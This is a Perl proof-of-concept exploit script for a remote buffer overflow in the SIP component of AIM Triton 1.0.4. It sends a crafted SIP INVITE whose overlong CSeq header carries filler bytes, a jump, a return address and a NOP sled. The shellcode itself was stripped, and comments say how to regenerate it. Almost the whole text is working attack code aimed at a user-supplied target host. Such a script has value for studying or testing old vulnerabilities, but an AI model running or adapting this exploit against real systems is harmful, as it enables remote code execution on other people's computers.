
AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC)


# p0c
# Tested on Windows XP SP2 with triton 1.0.4
# c0rrupt -{at}- f34r -{dot}- us
# This exploits the sipXtapi vulnerability in Triton, which has since been patched.
# The exploit sends a single crafted SIP INVITE in one UDP datagram to the Triton
# client; an overlong CSeq header overflows a fixed-size buffer and leads to
# execution of the embedded payload.
# The Triton client does not open the sipxtapi port 5061 by default.
# The port is opened when the client attempts any talk session, and stays
# open for the remainder of the time it is running.

use strict;
use warnings;
use IO::Socket::INET;



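# win32_exec -  EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum
#
# NOTE(review): the payload bytes were stripped from this listing, so the
# shellcode is left empty here. Regenerate a 351-byte win32_exec payload with
# the PexAlphaNum encoder (the original popped calc.exe with EXITFUNC=thread)
# and paste it in. While it is empty the script refuses to send anything, so
# a half-built CSeq header is never fired at a live host.
my $shellcode = "";

# Port the client's sipXtapi stack listens on once a talk session has been
# attempted (see the header comment); it is not open on a freshly started client.
my $sip_port = 5061;

print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n";
print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n";

# The usage branch exits now; the original listing fell through and would have
# built a packet for an undefined target.
my $target = $ARGV[0];
if (not defined $target or $target eq '') {
    print "[+] Usage: trionPWN.pl <host> [+]\n";
    exit 1;
}

# Only hostname / dotted-quad characters reach the resolver. IO::Socket::INET
# is IPv4-only, so there is no need to admit colons for IPv6 literals.
if ($target !~ m{\A[A-Za-z0-9.\-]+\z}) {
    die "[-] '$target' does not look like a hostname or IPv4 address\n";
}

if (length($shellcode) == 0) {
    die "[-] No shellcode embedded; see the comment at the top of the script\n";
}

# CSeq payload layout, as given in the original listing:
#   780 bytes of filler, a short forward jump (EB 0C) padded with two NOPs,
#   the 4-byte little-endian address 0x4001e7d9 that execution is redirected
#   through, a 500-byte NOP sled, and then the shellcode.
# The listing was cut after the NOP sled; the shellcode is the only sensible
# thing that can follow it — TODO confirm against the original post.
my $cseq = "B" x 780
         . "\xEB\x0C\x90\x90"
         . "\xd9\xe7\x01\x40"
         . "\x90" x 500
         . $shellcode;

# Minimal SIP INVITE. The From/To hosts were redacted ("xxx...") by the archive;
# the overflow payload travels in the CSeq header. Each header line ends in
# "\r" followed by a literal newline, giving the CRLF that SIP requires.
my $packet =
"INVITE sip:a@xxxxxxxxx:5555 SIP/2.0\r
From: <sip:hello@xxxxxxxxx:5555>;tag=1c32606\r
To: sip:CFB5A74A87D97A19@xxxxxxxxxxxxx:5061\r
Call-Id: 65f65f65d6sexcytv\r
Cseq: $cseq";

print "[+] Packet Generated.. Sending to " . $target . "\n";

# A single UDP datagram is all that is sent. With the 351-byte payload the
# datagram is roughly 1.8 KB, so it is IP-fragmented on a 1500-byte MTU; a
# path that drops fragments loses it silently, and UDP gives no delivery
# feedback either way.
my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerAddr => $target,
    PeerPort => $sip_port,
) or die "[-] Could not create UDP socket to $target:$sip_port: $@\n";

my $sent = $sock->send($packet);
if (not defined $sent or $sent != length $packet) {
    die "[-] send() failed: $!\n";
}
close $sock or die "[-] close() failed: $!\n";

# "check your shell" is inherited from the original; the documented payload
# launches calc.exe and opens no shell, so success is visible on the target,
# not on this end.
print "[+] Attack completed, check your shell.\n";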